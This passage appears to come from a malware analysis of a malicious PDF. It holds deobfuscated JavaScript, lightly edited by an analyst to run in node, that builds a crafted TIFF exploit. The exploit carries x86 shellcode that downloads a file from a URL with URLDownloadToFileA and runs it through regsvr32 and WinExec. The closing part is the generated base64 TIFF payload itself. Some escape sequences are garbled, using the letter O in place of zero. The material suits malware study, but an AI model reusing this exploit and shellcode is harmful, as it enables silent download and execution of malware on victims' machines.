xE9\x5E\x93\xD1\xE0\x03\x85\xC4\x01\x00\x00\x31\xF6\x96\x66\xAD\xC1\xE0\x02\x03\x85\xBC\x01\x00\x00\x89\xC6\xAD\x03\x85\xB8\x01\x00\x00\xC3\xEB\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x89\x85\xB8\x01\x00\x00\x56\x57\xE8\x58\xFF\xFF\xFF\x5F\x5E\xAB\x01\xCE\x80\x3E\xBB\x74\x02\xEB\xED\xC3\x55\x52\x4C\x4D\x4F\x4E\x2E\x44\x4C\x4C\x00\x55\x52\x4C\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x54\x6F\x46\x69\x6C\x65\x41\x00\x55\x73\x65\x72\x33\x32\x2E\x65\x78\x65\x00";
shell += url_var;
while (shell.length < 1044) shell += "\x00";
shell = base64_encode(shell);
if(get_ver() < 9000){
end_tiff = "o+uA\x53\x6agggkpuL4BK/////wAAA\x41BAAAAAAAAAAAA\x51AAAA\x41AA\x41BReA\x53iBW\x68\x45oPY4BKo+u\x41\x53j\x41gg\x6bqv\x57IBK\x58Vy\x41SiYAAAAA\x41AAAA\x41AAAA\x41AAABB\x51UF\x42Q\x55F\x42QQU\x58gE\x70qaVm\x4eEE2BSgUX\x67\x45p0JAS\x4e\x4dFOBS\x67UXg\x45p\x42Q\x55F\x42\x65AzzpEtT\x67U\x6f\x43F4B\x4b\x51U\x46BQT\x48\x4aZItx\x4dIt2D\x49t2\x48ItuCItGIIs2Z\x6a\x6cIGHXyi0U8i1QFeAH\x71\x693Ig\x41e4xyU\x47tAe\x69\x4cGCtYB\x49\x4875SD\x64/3XvSY\x74a\x4aAHrZosMS4taHAHrA\x79yL\x69e\x5aqBP82/9WF\x77K119YE4S\x55kqAHXtlj\x48\x4atQP\x7apQ==";
} else {
end_tiff = "\x6bB+A\x53j\x69\x51\x68E\x709fo\x42K/////w\x41AAA\x42AAAAA\x41\x41AAAAAQAAAAAAAA\x70WO\x41S\x69\x41Ji\x6b\x71WIYBKkB+A\x53\x6a\x43\x51hErY\x704B\x4bjauASiYAA\x41\x41AAA\x41AAAAAAAA\x41\x41ABBQUFBQUFBQaVjgEp\x71aV\x6dNM7WASqVjgEp0JAS\x4eT0uC\x53q\x56j\x67Ep4\x44POkIg6CSqJ\x6agEpB\x51U\x46\x42M\x63lki3\x45wi3YMi3Y\x63i24\x49i0YgizZm\x4fU\x67\x59dfKL\x52Ty\x4cVAV4\x41eqLciA\x427jHJ\x51\x610\x426IsYK1\x67EgfvlIN3/d\x659\x4ai1okAetmiwxLi1oc\x41es\x44LIuJ5moE/\x7ab/1YXArX\x581gThJSS\x6f\x41\x64\x652WM\x63\x6d1\x41/Ol";
}
tiff = "SUkqADggAACQ" + grow('QUFB', 2000) + shell + grow('kJCQ', 7592);
tiff += "kAcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////"+end_tiff;
pgGzgu.rawValue = tiff;
}
run();
As always more JavaScript. Get the new JS ready for node-js:
function base64_encode(data) {
var b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
var o1, o2, o3, h1, h2, h3, h4, bits, i = 0,
ac = 0,
enc = "",
tmp_arr = [];
do {
o1 = data.charCodeAt(i++);
o2 = data.charCodeAt(i++);
o3 = data.charCodeAt(i++);
bits = o1 << 16 | o2 << 8 | o3;
h1 = bits >> 18 & 0x3f;
h2 = bits >> 12 & 0x3f;
h3 = bits >> 6 & 0x3f;
h4 = bits & 0x3f;
tmp_arr[ac++] = b64.charAt(h1) + b64.charAt(h2) + b64.charAt(h3) + b64.charAt(h4);
} while (i < data.length);
enc = tmp_arr.join('');
return enc;
}
function get_ver() {
//var app_ver = app.viewerVersion.toString();
//@malforsec changed to work
var app_ver = "9.3.0";
app_ver = app_ver.replace('.', '');
while (app_ver.length < 4) {
app_ver += '0';
}
return parseInt(app_ver, 10);
}
function grow(body, len) {
while (body.length < len) {
body += body;
}
return body.substring(0, len);
}
function run() {
var url_var = fGRdP + "&h=03\x00";
shell = "\xE8\x00\x00\x00\x00]\x83\xED\x051\xC9d\x8Bq0\x8Bv \x8Bv\x1C\x8BF\x08\x8B~ \x8B6f9O\x18u\xF2\xBE\xEF\xOO\x00\x00\x01\xEE\xBF\xCF\x00\x00\x00\x01\xEF\xE8\x80\x01\xOO\xOO\x89\xEA\x81\xC2\xEF\x00\x00\x00Rh\x80\x00\x00\x00\xFF\x95\xCF\x00\x00\x00\x89\xEA\x81\xC2\xEF\xOO\x00\x001\xF6\x01\xC2\x8A\x9C5\x00\x02\x00\x00\x80\xFB\x00t\x06\x88\x1C2F\xEB\xEE\xC6\x042\x00\x89\xEA\x81\xC2\xE2\x01\x00\x00R\xFF\x95\xD3\x00\x00\x00\x89\xEA\x81\xC2\xED\x01\x00\x00RP\xFF\x95\xD7\x00\x00\x00j\x00j\x00\x89\xEA\x81\xC2\xEF\x00\x00\x00R\x89\xEA\x81\xC2
\x02\x00\x00Rj\x00\xFF\xD0j\xO5\x89\xEA\x81\xC2\xEF\x00\xOO\xOOR\xFF\x95\xDB\x00\x00\x00j\x05\x89\xEA\x81\xC2\xE3\xOO\xOO\x00R\xFF\x95\xDB\x00\xOO\x00j\x00\xFF\x95\xDF\x00\x00\x00\x00\x00\x00\x00\x00\x00\xOO\x00\x00\x00\x00\xOO\x00\x00\x00\x00\x00\x00\x00\x00regsvr32 -s GetTempPathA\x00LoadLibraryA\x00GetProcAddress\x00WinExec\x00ExitProcess\x00\xBB\x89\xF2\x89\xF70\xC0\xAEu\xFD)\xF7\x89\xF91\xC0\xBE<\x00\x00\x00\x03\xB5\xB8\x01\x00\x00f\xAD\x03\x85\xB8\x01\x00\x00\x8Bpx\x83\xC6\x1C\x03\xB5\xB8\x01\x00\x00\x8D\xBD\xBC\x01\x00\x00\xAD\x03\x85\xB8\x01\x00\x00\xAB\xAD\x03\x85\xB8\x01\x00\x00P\xAB\xAD\x03\x85\xB8\x01\x00\x00\xAB^1\xDB\xADV\x03\x85\xB8\x01\x00\x00\x89\xC6\x89\xD7Q\xFC\xF3\xA6Yt\x04^C\xEB\xE9^\x93\xD1\xE0\x03\x85\xC4\x01\x00\x001\xF6\x96f\xAD\xC1\xE0\x02\x03\x85\xBC\x01\x00\x00\x89\xC6\xAD\x03\x85\xB8\x01\x00\x00\xC3\xEB\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x89\x85\xB8\x01\x00\x00VW\xE8X\xFF\xFF\xFF_^\xAB\x01\xCE\x80>\xBBt\x02\xEB\xED\xC3URLMON.DLL\x00URLDownloadToFileA\x00User32.exe\x00";
shell += url_var;
while (shell.length < 1044) shell += "\xOO";
shell = base64_encode(shell);
if (get_ver() < 9000) {
end_tiff = "o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAABReASiBWhEoPY4BKo+uASjAggkqvWIBKXVyASiYAAAAAAAAAAAAAAAAAAABBQUFBQUFBQQUXgEpqaVmNEE2BSgUXgEp0JASNMFOBSgUXgEpBQUFBeAzzpEtTgUoCF4BKQUFBQTHJZItxMIt2DIt2HItuCItGIIs2ZjlIGHXyi0U8i1QFeAHqi3IgAe4xyUGtAeiLGCtYBIH75SDd/3XvSYtaJAHrZosMS4taHAHrAyyLieZqBP82/9WFwK119YE4SUkqAHXtljHJtQPzpQ==";
} else {
end_tiff = "kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAApWOASiAJikqWIYBKkB+ASjCQhErYp4BKjauASiYAAAAAAAAAAAAAAAAAAABBQUFBQUFBQaVjgEpqaVmNM7WASqVjgEp0JASNT0uCSqVjgEp4DPOkIg6CSqJjgEpBQUFBMclki3Ewi3YMi3Yci24Ii0YgizZmOUgYdfKLRTyLVAV4AeqLciAB7jHJQa0B6IsYK1gEgfvlIN3/de9Ji1okAetmiwxLi1ocAesDLIuJ5moE/zb/1YXArXX1gThJSSoAde2WMcm1A/Ol";
}
tiff = "SUkqADggAACQ" + grow('QUFB', 2000) + shell + grow('kJCQ', 7592);
tiff += "kAcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////" + end_tiff;
//pgGzgu.rawValue = tiff;
console.log(tiff);
}
//@malforsec add due to heavy deletion in previous step
fGRdP = "";
// @malforsec - end add section
run();
SUkqADggAACQQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB6AAAAABdg+OFMclki3Ewi3YMi3YciOYIi34gizZmOU8YdfK+7wAAAAHuv88AAAAB7+iAAQAAieqBwu8AAABSaIAAAAD/lc8AAACJ6oHC7wAAADH2AcKKnDUAAgAAgPsAdAaIHDJG6+7GBDIAieqBwuIBAABS/5XTAAAAieqBwuOBAABSUP+V1wAAAGoAagCJ6oHC7wAAAFKJ6oHCCwIAAFJqAP/QagWJ6oHC7wAAAFL/ldsAAABqBYnqgcLjAAAAUv+V2wAAAGoA/5XfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAByZWdzdnIzMiAtcyBHZXRUZW1wUGFOaEEATG9hZExpYnJhcnlBAEdldFByb2NBZGRyZXNzAFdpbkV4ZWMARXhpdFByb2Nlc3MAu4nyifcwwK51/Sn3ifkxwL48AAAAA7W4AQAAZqODhbgBAACLcHiDxhwDtbgBAACNvbwBAACtA4W4AQAAq6ODhbgBAABQq6ODhbgBAACrXjHbrVYDhbgBAACJxonXUfzzpllOBF5D6+lek9HgA4XEAQAAMfaWZq3B4AIDhbwBAACJxqODhbgBAADD6xAAAAAAAAAAAAAAAAAAAAAAiYW4AQAAVlfoWP///19eqwHOgD67dALr7cNVUkxNTO4uRExMAFVSTERvd25sb2FkVG9GaWxlQQBVc2VyMzIuZXhlACZoPTAzAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC